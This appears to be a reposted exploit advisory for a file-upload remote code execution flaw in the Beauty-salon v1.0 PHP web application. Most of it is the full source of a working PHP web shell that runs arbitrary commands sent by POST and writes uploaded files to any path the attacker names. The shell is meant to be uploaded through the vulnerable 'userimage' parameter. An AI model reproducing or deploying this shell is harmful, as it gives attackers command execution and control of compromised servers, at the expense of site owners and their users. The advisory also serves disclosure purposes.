Share
## https://sploitus.com/exploit?id=PACKETSTORM:171527
## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)  
## Exploit Author: nu11secur1ty  
## Date: 10.12.2022  
## Vendor: https://code4berry.com/projects/beautysalon.php  
## Software: https://code4berry.com/project%20downloads/beautysalon_download.php  
## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt  
  
## Description:  
The parameter `userimage` from Beauty-salon-2022 suffers from Web  
Shell-File Upload - RCE.  
NOTE: The user permissions of this system are not working correctly, and  
the function is not sanitizing well.  
The attacker can use an already created account from someone who controls  
this system and he can upload a very malicious file by using this  
vulnerability,  
or more precisely (no sanitizing of function for edit image), for whatever  
account, then he can execute it from anywhere on the external network.  
  
Status: HIGH Vulnerability  
  
[+] Exploit:  
  
```php  
<!-- Project Name : PHP Web Shell -->  
<!-- Version : 4.0 nu11secur1ty -->  
<!-- First development date : 2022/10/05 -->  
<!-- This Version development date : 2022/10/05 -->  
<!-- Moded and working with PHP 8 : 2022/10/05 -->  
<!-- language : html, css, javascript, php -->  
<!-- Developer : nu11secur1ty -->  
<!-- Web site : https://www.nu11secur1ty.com/ -->  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "  
http://www.w3.org/TR/html4/strict.dtd">  
<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html" charset="euc-kr">  
<title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>  
<script type="text/javascript">  
function FocusIn(obj)  
{  
if(obj.value == obj.defaultValue)  
obj.value = '';  
}  
  
function FocusOut(obj)  
{  
if(obj.value == '')  
obj.value = obj.defaultValue;  
}  
</script>  
</head>  
<body>  
<b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo  
$_SERVER['REQUEST_URI'] ?></b><br><br>  
  
HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>  
REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>  
  
<br>  
  
<form name="cmd_exec" method="post" action="http://<?php echo  
$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">  
<input type="text" name="cmd" size="70" maxlength="500" value="Input  
command to execute" onfocus="FocusIn(document.cmd_exec.cmd)"  
onblur="FocusOut(document.cmd_exec.cmd)">  
<input type="submit" name="exec" value="exec">  
</form>  
<?php  
if(isset($_POST['exec']))  
{  
exec($_POST['cmd'],$result);  
  
echo '----------------- < OutPut > -----------------';  
echo '<pre>';  
foreach($result as $print)  
{  
$print = str_replace('<','<',$print);  
echo $print . '<br>';  
}  
echo '</pre>';  
}  
else echo '<br>';  
?>  
  
<form enctype="multipart/form-data" name="file_upload" method="post"  
action="http://<?php echo $_SERVER['HTTP_HOST']; echo  
$_SERVER['REQUEST_URI'] ?>">  
<input type="file" name="file">  
<input type="submit" name="upload" value="upload"><br>  
<input type="text" name="target" size="100" value="Location where file will  
be uploaded (include file name!)"  
onfocus="FocusIn(document.file_upload.target)"  
onblur="FocusOut(document.file_upload.target)">  
</form>  
<?php  
if(isset($_POST['upload']))  
{  
$check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);  
  
if($check == TRUE)  
echo '<pre>The file was uploaded successfully!!</pre>';  
else  
echo '<pre>File Upload was failed...</pre>';  
}  
?>  
</body>  
</html>  
```  
  
  
# Proof and Exploit:  
[href](https://streamable.com/ewdmoh)  
  
# m0e3:  
[href](  
https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html  
)